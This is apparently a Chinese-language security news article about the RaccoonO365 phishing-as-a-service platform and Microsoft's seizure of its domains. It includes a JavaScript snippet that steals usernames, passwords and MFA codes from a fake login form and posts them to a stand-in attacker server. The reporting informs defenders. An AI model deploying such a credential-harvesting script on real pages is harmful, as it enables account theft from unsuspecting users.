自2024年年中以来,网络犯罪分子利用一个名为RaccoonO365的基于订阅的钓鱼平台,大规模窃取Microsoft 365的登录凭证。
作为一种现成服务,RaccoonO365对技术技能的要求极低,这使得威胁行为者能够通过仿冒微软的官方通信来发起具有说服力的钓鱼攻击活动。
这些工具包模仿微软的品牌标识、电子邮件模板和登录门户,以诱骗收件人泄露用户名、密码和多因素认证(MFA)代码。
截至2025年9月,该操作已影响94个国家的5000多个账户,这表明商品化的社会工程学工具所带来的风险十分普遍。
在一项协同法律行动中,微软数字犯罪部门(DCU)从纽约南区法院获得了一项法院命令,查封了338个用于协助分发RaccoonO365的域名,从而有效瓦解了该平台的核心基础设施。
微软分析师指出,这项服务发展迅速,如今其具备的功能可破坏多因素认证保护,并能以每天多达9000个目标的速度自动窃取凭证。
被查封的域名既充当了钓鱼主机,又作为订阅管理的命令与控制接口,这削弱了订阅者发起新攻击的能力。
虽然并非所有被盗凭证都导致了直接的网络入侵,但对高价值行业,尤其是医疗健康领域的影响是严重的。
至少20家美国医疗保健机构报告称,在遭遇成功的RaccoonO365钓鱼攻击后,出现了患者护理延误、实验室检测结果受损以及数据泄露的情况。
微软与Health-ISAC的合作凸显了其对公共安全的影响,因为被盗凭证往往是后续部署恶意软件或勒索软件的初始访问点。
DCU的迅速干预表明,针对那些让恶意行为者拥有能力的低门槛工具,采取法律和技术对策是必要的。
微软分析师确认约书亚·奥贡迪佩(一位尼日利亚开发者)是RaccoonO365的首席架构师。
由于一次操作安全失误导致一个加密货币钱包信息泄露,调查人员追踪到了超过10万美元的订阅付款。
奥贡迪佩的Telegram频道拥有超过850名成员,该频道既宣传标准的钓鱼工具包,也推广新推出的“AI-MailCheck”服务,这项服务旨在提高鱼叉式钓鱼的效果。
这种归因凸显了精简的犯罪集团如何能以最低的运营成本扩大规模,这对防御者预测模块化威胁服务构成了挑战。
感染机制深入探究
RaccoonO365的感染机制围绕动态表单注入和透明重定向策略展开。
当受害者点击恶意链接时,浏览器会被重定向到一个模仿微软官方门户网站的虚假登录页面。
一小段JavaScript代码片段在运行时被注入,它会捕获输入字段并将凭据转发到攻击者的服务器:-
document.querySelector('form').addEventListener('submit', function(e) {
e.preventDefault();
let creds = {
user: document.getElementById('username').value,
pass: document.getElementById('password').value,
otp: document.getElementById('mfa').value
};
fetch('https://attacker-server.com/collect', {
method: 'POST',
body: JSON.stringify(creds),
headers: {'Content-Type': 'application/json'}
}).then(()=> window.location.href = 'https://login.microsoftonline.com');
});这段代码确保了数据的无缝泄露,同时将用户重定向到合法的登录页面,从而最大限度地减少了怀疑。
高级攻击者利用会话令牌重用和标头操纵来绕过多因素认证(MFA)提示。
结合自动电子邮件分发和人工智能驱动的内容变体,这条感染链体现了现代钓鱼技术的复杂性,并凸显了分层防御和用户意识的至关重要性。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
